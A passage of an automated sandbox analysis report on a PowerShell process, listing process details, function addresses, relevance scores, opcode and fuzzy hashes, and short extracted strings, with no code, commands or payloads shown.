Start date:	09/09/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Imagebase:	0x7ff6ce570000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFAACB3B161 Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1825627139.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacb30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faa1286a13684b07993e7d041e04491bea45056deb5be0f3856a9f82e28ab8be
Instruction ID: ed7311dda01be8b45ca0487c95882c54fbec344629cf1b48544ad82b289a2801
Opcode Fuzzy Hash: faa1286a13684b07993e7d041e04491bea45056deb5be0f3856a9f82e28ab8be
Instruction Fuzzy Hash: C9D17F70A18A4DCFEBA8DF28C855BE977D1FF58300F04826AE84DC7695CB75E9448B81

Function 00007FFAACB3BF11 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1825627139.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacb30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 678792cbed42a79f788e8183c4b82fa4698f9a5e1ee24359823a0c49a553179e
Instruction ID: f487f5c2c3ceef7c42ad23cbddd9f63f3498e8b0ff197cb86698c9c212fc1a6f
Opcode Fuzzy Hash: 678792cbed42a79f788e8183c4b82fa4698f9a5e1ee24359823a0c49a553179e
Instruction Fuzzy Hash: 4AD16F70A08A4E8FEBA8DF28C8557E977D1FB58300F14822AE80DC7695DF79D9448BC1

Function 00007FFAACB3C828 Relevance: .5, Instructions: 512COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1825627139.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacb30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b39f87d0fcc798694ac1417d16d1613447d05b293ecd328ca6a05e7db715956f
Instruction ID: 820064a91817b042986c95767f3668bd319b4cbc11c47614a8436dd3c3ee0ab1
Opcode Fuzzy Hash: b39f87d0fcc798694ac1417d16d1613447d05b293ecd328ca6a05e7db715956f
Instruction Fuzzy Hash: C681377061CA494FE789EB5CC494AB5B7E1FF96310B1005BED08EC36A7DA26EC46C780

Function 00007FFAACC04929 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1826426533.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bae96f6a2cdeff9488f796dc75dc1c8c6620864d242a3385601e11b95523668
Instruction ID: 6fc1b0ac4e7e869b3ca82466c1d26117fa5b86cd31800d9987d1eede295f9560
Opcode Fuzzy Hash: 9bae96f6a2cdeff9488f796dc75dc1c8c6620864d242a3385601e11b95523668
Instruction Fuzzy Hash: 95E13A7290EB8A9FF7D5DF2888556B67BD1EF56210F0841BAE44DC71D3DE28E8488381

Function 00007FFAACC05A1D Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1826426533.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1094c5b4e3ddae2fb4dddeacba54df28d8a31b9038a0f527e407c3f0d38cdbf
Instruction ID: cd6cd11ac0e5d31515efb25633a598fa280a5117300de7a3a1941e77fb22b80d
Opcode Fuzzy Hash: b1094c5b4e3ddae2fb4dddeacba54df28d8a31b9038a0f527e407c3f0d38cdbf
Instruction Fuzzy Hash: D8B11672E0EB8A9FFBD59B6848555B57BE1EF56210B0841BBD04DC71D3EA18EC0883C5

Function 00007FFAACB3BB21 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1825627139.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacb30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a28326600b6a3c77124a52c7729f2b3efd93513848eb22640f3fc4e9b22ea1b2
Instruction ID: 48ea2bb03880a4d7981b1f391b8260ee2c538163a517788ea44a8c10de88e5c6
Opcode Fuzzy Hash: a28326600b6a3c77124a52c7729f2b3efd93513848eb22640f3fc4e9b22ea1b2
Instruction Fuzzy Hash: 77915D70A08A4D8FEBA8EF28C4557E977D1FF98300F54822AE84DC7695CE7499448BC1

Function 00007FFAACC04AC7 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1826426533.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00adf71814d5bf8bf2cfecb04e2cbab9dcc6f79a69ba8fa2ac043c840428159a
Instruction ID: b68a4948a018c75d2494c7a0c515e2febea0a1cb91ba2fb5daf0ebd63da9b47e
Opcode Fuzzy Hash: 00adf71814d5bf8bf2cfecb04e2cbab9dcc6f79a69ba8fa2ac043c840428159a
Instruction Fuzzy Hash: 6D51D662D1FB869FF7E5DF28485567AAAD1EF52211B5840B9E04CC71D2DE28EC488381

Function 00007FFAACC05B42 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1826426533.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09c16c029a26751124c3d218472e76337836c94dd466d6b2713999715bb566e8
Instruction ID: 833563e816298e336e655b948218c82b2fad3e04e1c659fe227e623cb752c826
Opcode Fuzzy Hash: 09c16c029a26751124c3d218472e76337836c94dd466d6b2713999715bb566e8
Instruction Fuzzy Hash: 3D312D62D1FB8B9FFBE59F681815178AAE0EF06210B5801BBD44DC71D3ED08AC0883C5

Function 00007FFAACB35BBA Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1825627139.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacb30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39aacd3bd392e7bba51300ae3070c2f61970e7c80b12acedd123aac9b63c4716
Instruction ID: 10d9953422703299bc14963ae958e366f128ef4c2920676e969e74f28df585c4
Opcode Fuzzy Hash: 39aacd3bd392e7bba51300ae3070c2f61970e7c80b12acedd123aac9b63c4716
Instruction Fuzzy Hash: D0316B70A189198FDF98EF58C485EE8B7A1FF58304F54406AD40DD3292CA35E886CBC0

Function 00007FFAACB3B5A4 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1825627139.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacb30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a293217a699c2596b45efb3e9415849ec1ff369342f41f842993e32dfd7c69b
Instruction ID: dfc94cb33eff4877a0f288591229ed2ff9433f7117fc1bc475951f78ad4a5ccb
Opcode Fuzzy Hash: 2a293217a699c2596b45efb3e9415849ec1ff369342f41f842993e32dfd7c69b
Instruction Fuzzy Hash: 3B316F7091A66ECEFBB49F14CC1ABF87294FF42309F408139D40D86693DA39A949CB91

Function 00007FFAACB341E5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1825627139.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacb30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
Instruction ID: 0de56ee8ccabd95d00ef6ed2301f593eac2516e96f5fcd578bc96feea926d05f
Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
Instruction Fuzzy Hash: 7101677115CB0C8FD744EF0CE451AA5B7E0FB99364F10056DE58AC3655DB36E882CB45

Analysis Process: powershell.exePID: 3452, Parent PID: 5504COMMON

Executed Functions

Function 074D2D30 Relevance: 15.5, Strings: 12, Instructions: 508COMMON

Download Yara Rule

Strings

$q, xrefs: 074D3187
$q, xrefs: 074D2E42
4'q, xrefs: 074D2EB4
4'q, xrefs: 074D3047
4'q, xrefs: 074D324A
$q, xrefs: 074D2E06
4'q, xrefs: 074D3053
$q, xrefs: 074D31EC
4'q, xrefs: 074D2EA8
4'q, xrefs: 074D323E
$q, xrefs: 074D2E4E
$q, xrefs: 074D31E0

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
API String ID: 0-3953147099
Opcode ID: a6b1929a71115eb936dbe9cc3ae5a1b4fa0aa948ba9de671bfc5c334f24311ed
Instruction ID: 80c4dab0c13d36087eb12462afab61ffc5effb9643af0efa727e6a9a0d631054
Opcode Fuzzy Hash: a6b1929a71115eb936dbe9cc3ae5a1b4fa0aa948ba9de671bfc5c334f24311ed
Instruction Fuzzy Hash: C9F11871B04346DFDB258F65D8217EBBBA1BF86211F1884ABD885CB351DA31CC46C7A2

Function 074D61D0 Relevance: 13.4, Strings: 10, Instructions: 898COMMON

Download Yara Rule

Strings

4'q, xrefs: 074D67EA
4'q, xrefs: 074D6699
tPq, xrefs: 074D6274
`, xrefs: 074D740D
4'q, xrefs: 074D67F6
`, xrefs: 074D7403
4'q, xrefs: 074D6869
4'q, xrefs: 074D66A5
tPq, xrefs: 074D6280
4'q, xrefs: 074D6875

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$`$`
API String ID: 0-2267819006
Opcode ID: 21132eb6ec39e4b7e596579c13fa57204df0dabc8573ce8bb6d4491e30846725
Instruction ID: 1f67ed1ebb13e0865aefb53084fbcd27a7d10a9a1115f8153148a17a72c997f4
Opcode Fuzzy Hash: 21132eb6ec39e4b7e596579c13fa57204df0dabc8573ce8bb6d4491e30846725
Instruction Fuzzy Hash: 997293B0E00215DFD725CF58C860B9ABBB2BF85304F15C5AAD9459B785CB71EC82CB92

Function 074D8050 Relevance: 13.0, Strings: 10, Instructions: 496COMMON

Download Yara Rule

Strings

4'q, xrefs: 074D80C4
$q, xrefs: 074D847F
$q, xrefs: 074D84DF
$q, xrefs: 074D84C3
4'q, xrefs: 074D8365
4'q, xrefs: 074D8359
4'q, xrefs: 074D80D0
$q, xrefs: 074D84EB
$q, xrefs: 074D849B
$q, xrefs: 074D84CF

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
API String ID: 0-4104424984
Opcode ID: bf9128b4d0ec3907252c277808be1d4c0d949cf36749aadd51a0e2b70f5dfa43
Instruction ID: 69afc4cc8e46b5ae3110a939e76753d622b49ec53e2321e1e073a97dc491f229
Opcode Fuzzy Hash: bf9128b4d0ec3907252c277808be1d4c0d949cf36749aadd51a0e2b70f5dfa43
Instruction Fuzzy Hash: 7CF129B1B043068FCB259B6998256FBBBE9AFC5211F18C4BBD985CB341DA31DC42C761

Function 074D77B0 Relevance: 7.8, Strings: 6, Instructions: 339COMMON

Download Yara Rule

Strings

4'q, xrefs: 074D7A4B
4'q, xrefs: 074D7ACA
4'q, xrefs: 074D7A3F
4'q, xrefs: 074D7ABE
4'q, xrefs: 074D78E6
4'q, xrefs: 074D78DA

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q
API String ID: 0-1794337482
Opcode ID: eba71fc1d153f0a764c87d18f647361ef8b4c267846e5a521e66e53238212305
Instruction ID: d6299198ace5ca91095d1f4119d48fa2210b57a1843bc7b311c216bae3929ec9
Opcode Fuzzy Hash: eba71fc1d153f0a764c87d18f647361ef8b4c267846e5a521e66e53238212305
Instruction Fuzzy Hash: F8D16FB0A012059FDB15DB68D460B9EBBB3BB88304F14C45AE9016F395CB71EC56CBA1

Function 074D09F8 Relevance: 7.8, Strings: 6, Instructions: 336COMMON

Download Yara Rule

Strings

4'q, xrefs: 074D0BCD
$q, xrefs: 074D0B5E
$q, xrefs: 074D0A2B
$q, xrefs: 074D0A39
4'q, xrefs: 074D0BC1
$q, xrefs: 074D0A0A

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q$$q
API String ID: 0-1538229613
Opcode ID: 2e9ffde844bfeee186331f2b2bdbc7e99fc772a1f6ce2fe307c1d4685789c248
Instruction ID: e9e715cec9bd1140851e5b4c0ea4ff4b2eb74dd91066c7658238ba93d529e61f
Opcode Fuzzy Hash: 2e9ffde844bfeee186331f2b2bdbc7e99fc772a1f6ce2fe307c1d4685789c248
Instruction Fuzzy Hash: FBB10BB1B042168FDB248B6994217FBBBA2EFD5214F18C46BD8858B361DB35DC42C7A1

Function 074D9EE0 Relevance: 6.8, Strings: 5, Instructions: 579COMMON

Download Yara Rule

Strings

4'q, xrefs: 074DA382
4'q, xrefs: 074DA21E
59$, xrefs: 074DA118
4'q, xrefs: 074DA228
4'q, xrefs: 074DA378

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$59$
API String ID: 0-1180138875
Opcode ID: 516745eeff5342d44f40571012fac658bc29f3d469b4eeb8f59c31243e1f87cb
Instruction ID: d80c6219c313e88b6aed9bbca1ff7b2fef3bf4dac68912eff31dbae5150986e2
Opcode Fuzzy Hash: 516745eeff5342d44f40571012fac658bc29f3d469b4eeb8f59c31243e1f87cb
Instruction Fuzzy Hash: 4A1249B1B043059FD7258B7998217EB7BA2AFC5211F14C46BD585CB381DB32DC52C7A2

Function 074D86D0 Relevance: 4.0, Strings: 3, Instructions: 293COMMON

Download Yara Rule

Strings

$q, xrefs: 074D8965
4'q, xrefs: 074D8880
4'q, xrefs: 074D888C

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q
API String ID: 0-3927140803
Opcode ID: 65ca68d3fa61f1bde2d3411e93187c0d1e7e96099e00be613dc8253e2400df34
Instruction ID: 78187592cc3e446c9c0b2a22bd28a182e71d9251fccd091e163a4ffd1c5a04ee
Opcode Fuzzy Hash: 65ca68d3fa61f1bde2d3411e93187c0d1e7e96099e00be613dc8253e2400df34
Instruction Fuzzy Hash: 5EA115B0B043059FDB159B7588217FB7BA6AB86210F18C4ABE581CF392DA35DC81C762

Function 074D7790 Relevance: 4.0, Strings: 3, Instructions: 272COMMON

Download Yara Rule

Strings

4'q, xrefs: 074D7A3F
4'q, xrefs: 074D7ABE
4'q, xrefs: 074D78DA

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q
API String ID: 0-3126650252
Opcode ID: c2e0a1cdd2fd8c1a70675aac7bc6423497306b1ee99d0da73537ffe878f4a756
Instruction ID: 7bdb0654759eeb682b3e9e93242df0bf0d0cb9a370ebbce87171224909e7e591
Opcode Fuzzy Hash: c2e0a1cdd2fd8c1a70675aac7bc6423497306b1ee99d0da73537ffe878f4a756
Instruction Fuzzy Hash: 46B18CB0A012059FDB16CF54C460BDEBBB2BB88304F14C45AE9406F395CB35EC86CBA1

Function 074D69A3 Relevance: 2.9, Strings: 2, Instructions: 395COMMON

Download Yara Rule

Strings

4'q, xrefs: 074D6C14
4'q, xrefs: 074D6C08

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: cd7de307151ba8bc69dd68e0aa08ea81a9f0bd9cb406d78967ded65d8f36f903
Instruction ID: 1b5c6601c28634ee8a4128403005583a762a5f16c19d817ac4d45d995ddc66fa
Opcode Fuzzy Hash: cd7de307151ba8bc69dd68e0aa08ea81a9f0bd9cb406d78967ded65d8f36f903
Instruction Fuzzy Hash: F9F195B0B002149FD724DB58C850F9A7BB6FB84344F11C4AAE9496F795CB71ED818F51

Function 074D0C82 Relevance: 1.5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

Strings

$q, xrefs: 074D0F14

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: $q
API String ID: 0-1301096350
Opcode ID: 890a18a5aaa70bfe0128009d02f5fd4af6a9888881681273f973b5f2ef8ffa20
Instruction ID: 05577c34ccc0c240df4140fe1fa4d2989a3dc658a0d147266facce86db047a6a
Opcode Fuzzy Hash: 890a18a5aaa70bfe0128009d02f5fd4af6a9888881681273f973b5f2ef8ffa20
Instruction Fuzzy Hash: 6A813B717043599FC7154A2598216E7BFF1EFC6211F18846BD885CB662CB35DC46C3A1

Function 074D348D Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

tPq, xrefs: 074D3646

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: tPq
API String ID: 0-789928099
Opcode ID: 5efc55d1d823308d57570759806312f1e98d29f53927b73c6f37b8f0b6d72b40
Instruction ID: 723c3f0a277241c2c2c9967d3426e9ddc9b314e3f113e0682946baad6d4f7a0d
Opcode Fuzzy Hash: 5efc55d1d823308d57570759806312f1e98d29f53927b73c6f37b8f0b6d72b40
Instruction Fuzzy Hash: C651B2B060A385DFC7228F64C825A96BFB1AF46214F1EC4DBD4898F293C635DC46C792

Function 074D86B5 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

4'q, xrefs: 074D8880

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 9873014057a8a2c4b1ae743a8beda65c8efcb814b491959776ecc9f2c08c5f2b
Instruction ID: 79134a055aac2d1bb18489dbe775e2ea08090c0a6fec45216c095ee330969235
Opcode Fuzzy Hash: 9873014057a8a2c4b1ae743a8beda65c8efcb814b491959776ecc9f2c08c5f2b
Instruction Fuzzy Hash: C641E4F0B00302DFCB249A258960BFB77EAAB86340F5584A7E9819B795D735DC81C762

Function 074D5468 Relevance: .7, Instructions: 741COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f904150ca138a1951ed4049ead74761f123179f6e6d59ecf6c3e0b672929543
Instruction ID: 2bbed1d99a24f56de23b3f50af2f17201a5799d96534f9ff8b82dfe75d4b5657
Opcode Fuzzy Hash: 1f904150ca138a1951ed4049ead74761f123179f6e6d59ecf6c3e0b672929543
Instruction Fuzzy Hash: A7624AB4B002059FD714DB98C4A4AAAFBB2FF89304F24C46AD945AF355CB71EC52CB91

Function 074D544B Relevance: .6, Instructions: 557COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f9c9fed1cfe0f6c14eea9292f9f26eea26d84794260670ae2e8de06f1a23e65
Instruction ID: 8467159196b30234c55ca7a70bbb11a48f954505dfeb52a5b7ed6d3aeaf50108
Opcode Fuzzy Hash: 1f9c9fed1cfe0f6c14eea9292f9f26eea26d84794260670ae2e8de06f1a23e65
Instruction Fuzzy Hash: E93238B4A002159FD714CB98C4A0E9AFBB2FB85314F15C0AAD945AF356CB72EC52CB91

Function 074D5BDD Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2bb50b25b8b4f4a0a32d84655b5a600cd79c9e2c528b05081783bde036009e9
Instruction ID: a030fa8f4f1e8cb0fdb6d6fb4e404dcb289e11639cd4e5671ec087e963fd8b35
Opcode Fuzzy Hash: c2bb50b25b8b4f4a0a32d84655b5a600cd79c9e2c528b05081783bde036009e9
Instruction Fuzzy Hash: E11226B4A002059FD714CF98C4A4EAAFBB2FB85704F14C46AD945AF356CB72EC52CB91

Function 074D5060 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a357b93947161897ab37accd525904c6afd19bab9547fac40766a4e6a70388a4
Instruction ID: a1bc2a58c2f8aa3554df3594f213e9993d801e9c1539272379785105052e0058
Opcode Fuzzy Hash: a357b93947161897ab37accd525904c6afd19bab9547fac40766a4e6a70388a4
Instruction Fuzzy Hash: A6B16DB0A00205AFDB14DB64C464BEEBBE2AF89304F54C46AD941AF795CB72EC51CF91

Function 074D5041 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16481290310a6a374e16970972ccdf254c438c617f90ec2d189a2a48a80f1875
Instruction ID: 88c59b128e7c63b069d2b3d1121a27b1494dbada8d4ab3e7f2640661ad04f4cb
Opcode Fuzzy Hash: 16481290310a6a374e16970972ccdf254c438c617f90ec2d189a2a48a80f1875
Instruction Fuzzy Hash: A1A15EB0A00205AFDB15CB64C464BEEBBE2BF8A304F54C46AD541AB791CB72EC55CF51

Function 074D7BD6 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 617de2731a85e0b312b95f827e1ac23b93272d42e77745bc97a24f2badb406fc
Instruction ID: 9b0379b2b92b5039c0abd9e44b34eb8f005335ab9ef88681ea9cfe5ebf59ba1e
Opcode Fuzzy Hash: 617de2731a85e0b312b95f827e1ac23b93272d42e77745bc97a24f2badb406fc
Instruction Fuzzy Hash: 0E318EB0B41304AFE7199B64D860BEE7AA3FB85744F50C429E9016F791CF76DC428BA1

Function 00BAD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1614720688.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_bad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9801b7a72721a4f5bce00da91c219987b2425b9b019e27a6c0f569a9ec3924
Instruction ID: dd342bd3fa37b330398659801f5aee1179f1009e78a324def68dd2599842ce0d
Opcode Fuzzy Hash: ca9801b7a72721a4f5bce00da91c219987b2425b9b019e27a6c0f569a9ec3924
Instruction Fuzzy Hash: F301F23150C3409EE7308A21CCC4B66BFD8DF42725F18C19AED4A0F682C2789846CAB6

Function 00BAD006 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1614720688.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_bad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ecd38edf8466d7f8afa0afc425e745e2ad038b9fc7702a307001046ed4a4d28
Instruction ID: 46b6030447103106417aa80197e91fc3ef196e1387fdbc0d18715d593f98216b
Opcode Fuzzy Hash: 3ecd38edf8466d7f8afa0afc425e745e2ad038b9fc7702a307001046ed4a4d28
Instruction Fuzzy Hash: DF019E6210E3C09FD7228B218894B62BFA4DF53224F1881DBD9888F1A3C2689844CB72

Non-executed Functions

Function 074DC168 Relevance: 14.2, Strings: 11, Instructions: 483COMMON

Download Yara Rule

Strings

(oq, xrefs: 074DC591
tra, xrefs: 074DC645
tra, xrefs: 074DC302
(oq, xrefs: 074DC25E
(oq, xrefs: 074DC5A1
8ya, xrefs: 074DC225
tra, xrefs: 074DC637
(oq, xrefs: 074DC24E
tra, xrefs: 074DC2F4
>9T, xrefs: 074DC4A8
8ya, xrefs: 074DC232

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$8ya$8ya$>9T$tra$tra$tra$tra
API String ID: 0-3341856879
Opcode ID: 107c933b3b6ec4d3e5529768ebacfada0cebecc83444389b81c799d5a91ba9c0
Instruction ID: b4cd1f873167e65c6a1593e70a4cead13cc4a29b1db85d6a07e6ec336ea8e432
Opcode Fuzzy Hash: 107c933b3b6ec4d3e5529768ebacfada0cebecc83444389b81c799d5a91ba9c0
Instruction Fuzzy Hash: CDF1E3B1704305DFDB258F68D8A47EABBA2AF85211F14846BE5858B391DB31CC52CBB1

Function 074D1C88 Relevance: 12.9, Strings: 10, Instructions: 430COMMON

Download Yara Rule

Strings

$q, xrefs: 074D1DFE
